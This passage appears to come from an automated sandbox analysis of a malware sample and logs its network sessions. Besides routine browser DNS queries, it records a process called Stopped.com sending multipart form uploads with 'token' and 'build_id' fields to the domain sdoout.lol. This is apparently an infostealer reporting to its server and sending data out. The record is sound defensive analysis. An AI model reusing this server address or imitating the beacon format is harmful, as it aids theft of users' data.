                                                                                                                                                                                                                                                                                            Data Ascii: Cr240"0*H0^1"wgt2JG1)X4=&?[j,Lzjue[Iq*Ba/XPhL2%3_oH)'=e?j3UH|XMus[*?$F%I),-/e5)fOq^9(_ph2^YBPXf_8
                                                                                                                                                                                                                                                                                            2024-12-31 15:59:23 UTC1390INData Raw: 3c 0f e3 f9 d2 ff f8 fb 8f f1 b3 aa ea fc 5a ff 65 a8 3e ff f2 76 56 d5 8f bf fe b8 9e df fb 4a fe 2c 2f fd 58 f5 e3 8f bf ff eb c7 90 3f d4 25 97 fa fc ea 11 36 05 b0 0d c1 6d 23 05 75 5d 82 5a 95 8f c3 96 5b d7 73 d6 4d 5f 19 18 df 4a a0 b6 22 39 6c 91 fb 6c a3 f3 fd 2c 7c d5 8b 14 19 87 e6 72 d6 e7 d7 51 43 c1 e1 fb ef 9d ba 8a 34 3a 9f d4 f8 cb a1 77 6a e9 bf 9f 4f e7 c3 14 35 ef b7 d2 b7 fb ef 73 ca 6e f7 25 e1 ee 92 a5 e8 f2 fd 79 01 10 17 0f 63 e2 fc fd 91 b4 23 46 0c 8e b4 1b 1b e1 a3 2e ef a8 29 67 76 28 cd 10 21 53 ec 49 17 3e f2 20 dc 54 be b0 c5 23 dc 1d 83 eb b9 f4 a1 91 ef 0f db 83 da 5d 0b 80 ea c2 67 f3 11 c0 ee 08 4c 55 5a a8 16 40 1f 77 c3 5c 80 cd f9 b8 0f 1f 05 d8 fd 7b 9d df f7 16 4e b9 a7 7a 66 d5 6e 02 19 3a 72 f1 95 74 0c 72 0e cf
                                                                                                                                                                                                                                                                                            Data Ascii: <Ze>vVJ,/X?%6m#u]Z[sM_J"9ll,|rQC4:wjO5sn%yc#F.)gv(!SI> T#]gLUZ@w\{Nzfn:rtr
                                                                                                                                                                                                                                                                                            2024-12-31 15:59:23 UTC1390INData Raw: 9a 50 64 5d fb 40 b0 b4 75 cd a2 45 ec b5 f7 5f 79 7d 9c cd 6c 12 a9 d6 7b 85 01 32 0c 8b 32 98 4b 0f f9 85 0b e3 3c 40 38 52 9e 25 bb 7a 8f 3d a8 39 20 c4 e5 c3 0c b0 21 bf 16 af df 1f d6 7a ee 0d 99 c3 31 ea 95 12 c6 e4 1c 29 ba 47 74 ec a8 92 fb c2 95 5e e2 ca b0 a4 22 c6 26 76 ca 5e 73 34 d5 7c c4 e8 14 05 cb 7b 5f fe 1f 38 b8 6c f0 90 19 b5 92 81 f8 cc 81 4a 13 2f 1a 49 e0 78 71 23 7a 01 c2 0c 77 ba 14 2c e7 2c 3c 91 d1 4e bc 96 0a 3a 18 c8 cd 72 ef c9 b5 f8 8f da e7 6e b0 2f 3c 34 d7 ad f4 42 40 4c d8 a1 40 88 dc 18 8e 64 d6 1c e0 63 1e 05 cf 20 06 f7 3b 0b 70 9c 51 ec 56 dd fb 7d 11 7f 6b 6d ef 0d 1e 52 b0 4d ad e1 45 2a 6f 3e c1 ba 25 26 a2 d8 aa 43 9d 31 12 d1 9a b3 ce 3a 54 eb 81 1f 1b e6 0b 22 ca 2f 2d 08 8a 65 ef 77 c9 57 62 8f 5b 75 cd 1a e5
                                                                                                                                                                                                                                                                                            Data Ascii: Pd]@uE_y}l{22K<@8R%z=9 !z1)Gt^"&v^s4|{_8lJ/Ixq#zw,,<N:rn/<4B@L@dc ;pQV}kmRME*o>%&C1:T"/-ewWb[u
                                                                                                                                                                                                                                                                                            2024-12-31 15:59:23 UTC1390INData Raw: c0 c8 18 51 ae 14 17 a9 0a ca 56 6b be f7 64 1f 49 78 97 5a b7 31 fc 9e 6d a1 03 6f d9 e7 f7 53 08 01 c3 c5 b9 7a b9 76 b6 db 53 9b 34 0a 6b 4e 57 59 c3 5e 19 bf 00 5d 8b aa e8 60 1e 51 13 25 a6 e3 15 9d 7d ca 7d 96 c5 a9 08 a9 a5 b6 19 1f 60 d5 2f 62 7f 2f 56 f2 3d 57 f8 23 62 ea 11 f9 e1 a4 f7 19 e1 40 b8 32 a8 3b d1 0e 75 e4 ef 5e a5 8b 7d 02 3c b3 b0 c2 54 f7 e1 89 cc ec 28 67 76 59 d4 5a cb 31 52 23 4c d6 ce d6 b5 6f 6c b9 2b 3b 9d 71 b7 59 27 29 f2 cd 97 cc b0 23 c2 6d 96 10 c7 cf 94 88 f2 6e 6a 64 2b 51 dc e1 73 d9 1f ee 59 f3 bf e0 1f e0 37 0a e3 95 33 5e 91 a6 46 6d ea cf 64 89 31 b8 c4 90 37 6a 0a ad fa f8 c0 5c 14 73 a2 84 ce 1a f7 08 d6 da 7b b1 29 06 b5 cf 3b d4 47 7c d1 e7 3f 8a b5 cf 36 82 c8 ca 3a 7b 7f 72 db 3b 69 f1 47 d9 87 17 cd 7f 57
                                                                                                                                                                                                                                                                                            Data Ascii: QVkdIxZ1moSzvS4kNWY^]`Q%}}`/b/V=W#b@2;u^}<T(gvYZ1R#Lol+;qY')#mnjd+QsY73^Fmd17j\s{);G|?6:{r;iGW
                                                                                                                                                                                                                                                                                            2024-12-31 15:59:23 UTC1390INData Raw: d6 1f b2 cd fd bb 9e 52 c0 c6 ac 63 6d 6a 7d 63 a0 ee bf 61 fe 67 d7 ed a2 91 18 ea 83 e8 bc 84 3c f6 92 99 0e 39 52 fb 50 a4 8e 8d b9 50 b4 45 0e 0e e8 5c f4 48 13 5f 36 61 f7 d9 4a 58 d8 a4 e0 0f 1c 33 8b 34 04 b9 4e a3 a9 25 bf ca 6e d4 75 b6 3b e7 dc 7e 2b 83 f0 4b fc 4f d7 6f 8d 99 43 f4 2a 3b 16 67 fd f0 c0 81 0c 22 df 3e 68 cf fc 25 d5 a0 cd 23 dc 62 3a 6c 78 5f c7 cc 17 bd ce 53 9b 88 64 9b f2 5b 5f 98 71 3d 74 42 5f cb ac e5 6f 5a 85 bf 31 ff bd 96 74 6d fd 76 0d b8 3b 7f f7 5c 6e 6a 9f 9b 0e 4a ef 8f 11 b9 2d f8 fd b3 ca 10 dc fc ce f2 bf cd d3 72 cd a9 3a 3f 7e e8 ba 50 b9 e5 8c 85 66 3c 7d 7c cb b9 ae b1 2e d4 de 6e 77 cd fd f1 92 27 87 ff fc ac be ef 47 09 d4 77 ef e8 3d f4 6e 27 97 de a2 ef ff f7 ce 43 af 53 f3 cd ee 9a 5a 42 95 3d 1a be f9
                                                                                                                                                                                                                                                                                            Data Ascii: Rcmj}cag<9RPPE\H_6aJX34N%nu;~+KOoC*;g">h%#b:lx_Sd[_q=tB_oZ1tmv;\njJ-r:?~Pf<}|.nw'Gw=n'CSZB=
                                                                                                                                                                                                                                                                                            2024-12-31 15:59:23 UTC1390INData Raw: 5e b3 4e cb 73 3d 2b b0 5b de b2 1b ac ac c0 bf bd 49 06 60 0a 98 e5 c3 12 dc fa fd 5e 94 c6 93 21 f3 32 c4 3a e7 6a 98 8e e5 33 47 4c 6f 66 cf 66 8f 00 02 a7 37 5d af 9f 55 1c 7d 2f aa 0d 63 45 34 4d 9c 3f 0c 6f 34 66 3d 1f 97 c5 b3 39 14 7b e1 d5 d2 27 58 29 01 4d de d6 12 94 45 a0 b2 25 18 06 ec ff 89 3f ee 0f 01 1c 62 05 b0 8e 6f 05 55 2b 9a 4e 2b 15 bb 5a f9 59 a9 86 d5 aa 13 d9 6a a3 fa 56 e4 c4 f6 2d 76 5b 8b dd a8 15 f0 25 70 2a 41 38 f2 87 e9 80 f6 c5 43 a6 19 c3 34 71 63 28 94 f7 d5 3e a8 8d fb a7 40 9e 7a b1 db b3 2a 31 8c 90 2f 56 e5 7c e4 f7 bb 83 9f 23 9a 0d 8c ce 42 04 aa 0d 19 a0 6f d7 b2 9f 34 76 5f 6d 6e 6e d6 69 e4 4e a8 e8 02 80 b4 a5 20 5a 4b c7 e1 90 e1 cc 0d d0 9a 83 61 2e 2f 3c 5f c9 d6 50 bd 42 9b 7a 69 bf 37 7e c9 9f 3e a7 e6 e3
                                                                                                                                                                                                                                                                                            Data Ascii: ^Ns=+[I`^!2:j3GLoff7]U}/cE4M?o4f=9{'X)ME%?boU+N+ZYjV-v[%p*A8C4qc(>@z*1/V|#Bo4v_mnniN ZKa./<_PBzi7~>
                                                                                                                                                                                                                                                                                            2024-12-31 15:59:23 UTC1390INData Raw: e7 31 76 b4 3d 19 8d fb dd dd 4b 60 21 0e f5 cc 1f 33 7c 0c d2 d1 00 b1 81 5e 69 42 40 e6 1a a3 91 ad d6 e5 68 63 43 03 68 03 51 81 cd 15 5b 50 25 01 0d 0a a0 cc 37 ab d0 e0 70 db 64 42 b6 9f 01 12 e5 58 36 df 46 f2 c0 36 2c 9a 5a d0 f7 89 35 0a f9 9b 66 01 58 a1 26 0c 6a 4d 5c 4b 7b e9 58 7b 57 de c3 72 c3 01 d2 14 c3 96 8f 11 ca 88 39 7c 1d 63 60 72 6c d4 ef 71 f2 9c 49 0e 9c cd 6d 82 37 6e c9 82 9c 2f 0b 6e 24 69 39 f2 e2 78 83 7f 53 04 3d b6 a3 da b9 a8 71 16 77 6c c9 a0 89 56 73 5e 14 11 7c 7c 73 cb 7f 2a d9 f2 39 07 8f 6b 7d 56 ca c0 8d 61 7f 28 ec 36 ce 58 4c 31 40 12 ec 2c 6f 2c 2b 48 03 40 f2 e5 2b 62 36 46 17 48 75 0a bd e4 dc 22 b3 6e 9c 63 a5 86 71 d4 b8 31 30 23 af 19 81 78 83 e3 e9 5a 37 f8 9c 4b 22 f0 7a 80 ff ce 66 cd 63 e2 27 5d 67 e0 5c
                                                                                                                                                                                                                                                                                            Data Ascii: 1v=K`!3|^iB@hcChQ[P%7pdBX6F6,Z5fX&jM\K{X{Wr9|c`rlqIm7n/n$i9xS=qwlVs^||s*9k}Va(6XL1@,o,+H@+b6FHu"ncq10#xZ7K"zfc']g\
                                                                                                                                                                                                                                                                                            2024-12-31 15:59:23 UTC1390INData Raw: b2 db c0 47 fc c2 eb d3 07 f9 cb a9 80 c2 b8 ec 66 aa f4 9a a9 4f 23 9b 16 c3 b7 0c e9 94 d8 01 42 0d 39 01 c1 0c 00 05 bb 46 fd 6c 74 68 20 1a 73 50 b5 25 bf 9b 6b a1 76 bd ec 3e 5a 2f 34 82 c8 be 2c eb 72 e9 75 b9 81 5a f1 03 58 07 57 22 05 05 6e 85 8b 28 3e ed b7 c4 45 0d bd de ae 37 13 31 f9 80 3b 68 01 71 40 1d 01 b4 9c 4e 2d fe e0 0a c4 3b eb d6 d2 a0 03 02 2f 96 20 44 6d 8b bf 7c 02 6e 06 9b 90 bf 10 fe 39 81 a6 8e a4 2a f2 45 4e 66 1c a4 2b 79 31 d8 41 b0 51 04 2d 99 39 bc 77 2e 54 8b 76 6d a7 d8 02 27 86 e2 f3 dc 57 e3 03 ad 3a ec 69 93 fb 84 77 d0 7c da 4b 0a 2e 39 2d a6 36 d1 88 83 03 6c 5b fc 2f 79 5b 7d d8 a9 35 da cd 0e 88 f8 e2 03 a7 27 d3 a9 e0 0c 12 9c 09 82 d3 79 24 9a 2b cc 48 be 25 3a ab ff d0 19 81 59 31 2f 46 8c 01 89 b0 9a f6 ea aa
                                                                                                                                                                                                                                                                                            Data Ascii: GfO#B9Flth sP%kv>Z/4,ruZXW"n(>E71;hq@N-;/ Dm|n9*ENf+y1AQ-9w.Tvm'W:iw|K.9-6l[/y[}5'y$+H%:Y1/F
                                                                                                                                                                                                                                                                                            2024-12-31 15:59:23 UTC1390INData Raw: f4 d3 de f8 41 d0 ce 03 89 61 57 3a e2 0c 48 31 96 53 3b 09 22 96 46 85 74 06 dc 97 14 6e 80 5c 17 6e 36 1a 8d 75 f8 7f 78 5c 36 a8 54 68 6b 72 c2 09 eb c5 52 50 48 b9 ff e5 a7 0f 83 fe 39 c0 51 2f 55 aa a1 dd 0a 37 5c c2 bc b6 5f 75 f5 b9 25 6c 88 f3 83 06 9b 56 b8 4a 65 5e 38 8b ca 20 06 d7 57 1a f5 b5 67 d3 e7 cf d7 5e bd b0 17 96 14 85 5e 3c 5b 03 09 6f 56 e4 52 22 10 cb 74 09 03 2f bd f9 23 7e 95 07 5a 94 28 41 b2 07 11 ae 60 79 c8 fb cd c2 c6 aa 3b ff 69 1b 7c 15 7c 8c 84 24 dc 79 fa e4 d1 a3 a5 ed fe e0 66 98 c6 c9 78 09 45 c6 ed ac 3f 9a 0c c3 a5 83 d4 1b b2 e1 cd d2 d6 64 9c f4 87 a3 da a3 a5 d3 0f 3b df 56 0f 52 3f ec 8d c2 d5 fd 00 d6 3f 8d d2 70 d8 5c da 1a 80 ee 12 ae ae d5 ea 8f 9e 3c a5 a3 07 57 cc bd 02 12 70 3b 73 2e 49 16 9f 4e 31 20 51
                                                                                                                                                                                                                                                                                            Data Ascii: AaW:H1S;"Ftn\n6ux\6ThkrRPH9Q/U7\_u%lVJe^8 Wg^^<[oVR"t/#~Z(A`y;i||$yfxE?d;VR??p\<Wp;s.IN1 Q
                                                                                                                                                                                                                                                                                            2024-12-31 15:59:23 UTC1390INData Raw: 44 73 d4 f2 87 13 fa f8 51 4e 97 0f d5 84 e9 74 fa 59 da 7c bf e3 19 63 e7 07 e3 a7 9c f0 cd e3 fc 08 b5 3a ce 6e 1e 74 71 58 2e 86 7b e3 3e 33 82 51 35 c1 d9 f3 e4 51 51 26 64 2c af 85 36 8b 9c 7b 7a b0 77 c8 75 fa 03 ca fd a0 c3 ce 9a 6e be f5 7a 7b 67 77 ef cd db fd 77 ef 0f 0e 8f 8e 3f 7c 3c 39 fd f4 f9 cb d7 6f df 7f 30 cf 87 a1 c4 49 7a 7e 91 75 7b fd c1 af e1 68 3c b9 bc ba be f9 5d 6f ac 3d 5b 7f fe e2 ef 97 af f2 63 f2 15 f4 d6 9e 55 aa 4f dd 8a 03 ff c2 3f ab 3f 5d fa b7 46 ff 56 3a 94 2b 20 dc 78 de 0a 95 8b c3 47 91 c8 67 63 2b 40 91 24 6f ca 6e 7d 87 bd d2 71 e7 b6 91 dc ac b1 6c 22 71 23 d8 4d ad 1f 0c cf f9 69 73 e6 2f 50 b6 99 79 ee 77 4a 8a 21 24 4f 4b 33 1e c8 1d fb f4 19 74 19 80 e6 f6 62 bd 83 59 19 a8 db d0 e5 f1 d2 79 f6 89 b5 56 54
                                                                                                                                                                                                                                                                                            Data Ascii: DsQNtY|c:ntqX.{>3Q5QQ&d,6{zwunz{gww?|<9o0Iz~u{h<]o=[cUO??]FV:+ xGgc+@$on}ql"q#Mis/PywJ!$OK3tbYyVT


                                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                            21192.168.2.550058162.159.61.34435136C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                            2024-12-31 15:59:24 UTC245OUTPOST /dns-query HTTP/1.1
                                                                                                                                                                                                                                                                                            Host: chrome.cloudflare-dns.com
                                                                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                                                                            Content-Length: 128
                                                                                                                                                                                                                                                                                            Accept: application/dns-message
                                                                                                                                                                                                                                                                                            Accept-Language: *
                                                                                                                                                                                                                                                                                            User-Agent: Chrome
                                                                                                                                                                                                                                                                                            Accept-Encoding: identity
                                                                                                                                                                                                                                                                                            Content-Type: application/dns-message
                                                                                                                                                                                                                                                                                            2024-12-31 15:59:24 UTC128OUTData Raw: 00 00 01 00 00 01 00 00 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 00 00 29 10 00 00 00 00 00 00 54 00 0c 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                                            Data Ascii: wwwgstaticcom)TP
                                                                                                                                                                                                                                                                                            2024-12-31 15:59:24 UTC247INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                                                            Date: Tue, 31 Dec 2024 15:59:24 GMT
                                                                                                                                                                                                                                                                                            Content-Type: application/dns-message
                                                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                                                            Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                                            Content-Length: 468
                                                                                                                                                                                                                                                                                            CF-RAY: 8fab7a039ebb0ca4-EWR
                                                                                                                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                            2024-12-31 15:59:24 UTC468INData Raw: 00 00 81 80 00 01 00 01 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 c0 0c 00 01 00 01 00 00 01 1a 00 04 8e fa 50 23 00 00 29 04 d0 00 00 00 00 01 98 00 0c 01 94 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                                            Data Ascii: wwwgstaticcomP#)


                                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                            22192.168.2.550057162.159.61.34435136C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                            2024-12-31 15:59:24 UTC245OUTPOST /dns-query HTTP/1.1
                                                                                                                                                                                                                                                                                            Host: chrome.cloudflare-dns.com
                                                                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                                                                            Content-Length: 128
                                                                                                                                                                                                                                                                                            Accept: application/dns-message
                                                                                                                                                                                                                                                                                            Accept-Language: *
                                                                                                                                                                                                                                                                                            User-Agent: Chrome
                                                                                                                                                                                                                                                                                            Accept-Encoding: identity
                                                                                                                                                                                                                                                                                            Content-Type: application/dns-message
                                                                                                                                                                                                                                                                                            2024-12-31 15:59:24 UTC128OUTData Raw: 00 00 01 00 00 01 00 00 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 00 00 29 10 00 00 00 00 00 00 54 00 0c 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                                            Data Ascii: wwwgstaticcom)TP
                                                                                                                                                                                                                                                                                            2024-12-31 15:59:24 UTC247INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                                                            Date: Tue, 31 Dec 2024 15:59:24 GMT
                                                                                                                                                                                                                                                                                            Content-Type: application/dns-message
                                                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                                                            Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                                            Content-Length: 468
                                                                                                                                                                                                                                                                                            CF-RAY: 8fab7a03bfe1435d-EWR
                                                                                                                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                            2024-12-31 15:59:24 UTC468INData Raw: 00 00 81 80 00 01 00 01 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 c0 0c 00 01 00 01 00 00 01 0b 00 04 8e fa 50 63 00 00 29 04 d0 00 00 00 00 01 98 00 0c 01 94 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                                            Data Ascii: wwwgstaticcomPc)


                                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                            23192.168.2.550059172.64.41.34435136C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                            2024-12-31 15:59:24 UTC245OUTPOST /dns-query HTTP/1.1
                                                                                                                                                                                                                                                                                            Host: chrome.cloudflare-dns.com
                                                                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                                                                            Content-Length: 128
                                                                                                                                                                                                                                                                                            Accept: application/dns-message
                                                                                                                                                                                                                                                                                            Accept-Language: *
                                                                                                                                                                                                                                                                                            User-Agent: Chrome
                                                                                                                                                                                                                                                                                            Accept-Encoding: identity
                                                                                                                                                                                                                                                                                            Content-Type: application/dns-message
                                                                                                                                                                                                                                                                                            2024-12-31 15:59:24 UTC128OUTData Raw: 00 00 01 00 00 01 00 00 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 00 00 29 10 00 00 00 00 00 00 54 00 0c 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                                            Data Ascii: wwwgstaticcom)TP
                                                                                                                                                                                                                                                                                            2024-12-31 15:59:24 UTC247INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                                                            Date: Tue, 31 Dec 2024 15:59:24 GMT
                                                                                                                                                                                                                                                                                            Content-Type: application/dns-message
                                                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                                                            Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                                            Content-Length: 468
                                                                                                                                                                                                                                                                                            CF-RAY: 8fab7a03e85443a6-EWR
                                                                                                                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                            2024-12-31 15:59:24 UTC468INData Raw: 00 00 81 80 00 01 00 01 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 c0 0c 00 01 00 01 00 00 01 07 00 04 8e fa 41 c3 00 00 29 04 d0 00 00 00 00 01 98 00 0c 01 94 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                                            Data Ascii: wwwgstaticcomA)


                                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                            24192.168.2.550065116.203.14.4443904C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\164676\Stopped.com
                                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                            2024-12-31 15:59:25 UTC276OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                            Content-Type: multipart/form-data; boundary=----2nop8qimgv3w47ymgd2v
                                                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                                                                                                                                                                                                            Host: sdoout.lol
                                                                                                                                                                                                                                                                                            Content-Length: 3581
                                                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                                                                            2024-12-31 15:59:25 UTC3581OUTData Raw: 2d 2d 2d 2d 2d 2d 32 6e 6f 70 38 71 69 6d 67 76 33 77 34 37 79 6d 67 64 32 76 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 30 37 62 33 30 34 39 34 61 32 33 39 66 64 33 36 37 63 66 64 38 34 61 37 33 37 33 63 61 66 39 0d 0a 2d 2d 2d 2d 2d 2d 32 6e 6f 70 38 71 69 6d 67 76 33 77 34 37 79 6d 67 64 32 76 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 66 34 63 39 61 63 33 30 63 37 65 38 36 30 31 31 64 39 39 36 62 39 62 36 30 37 36 33 30 37 62 35 0d 0a 2d 2d 2d 2d 2d 2d 32 6e 6f 70 38 71 69 6d 67 76 33 77 34 37 79 6d 67 64 32 76 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                                            Data Ascii: ------2nop8qimgv3w47ymgd2vContent-Disposition: form-data; name="token"807b30494a239fd367cfd84a7373caf9------2nop8qimgv3w47ymgd2vContent-Disposition: form-data; name="build_id"f4c9ac30c7e86011d996b9b6076307b5------2nop8qimgv3w47ymgd2vCont
                                                                                                                                                                                                                                                                                            2024-12-31 15:59:26 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                            Server: nginx
                                                                                                                                                                                                                                                                                            Date: Tue, 31 Dec 2024 15:59:25 GMT
                                                                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                                                            2024-12-31 15:59:26 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                            Data Ascii: 2ok0


                                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                            25192.168.2.550075116.203.14.4443904C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\164676\Stopped.com
                                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                            2024-12-31 15:59:26 UTC278OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                            Content-Type: multipart/form-data; boundary=----5pzmopzcjectri5fua16
                                                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                                                                                                                                                                                                            Host: sdoout.lol
                                                                                                                                                                                                                                                                                            Content-Length: 207993
                                                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                                                            Cache-Control: no-cache
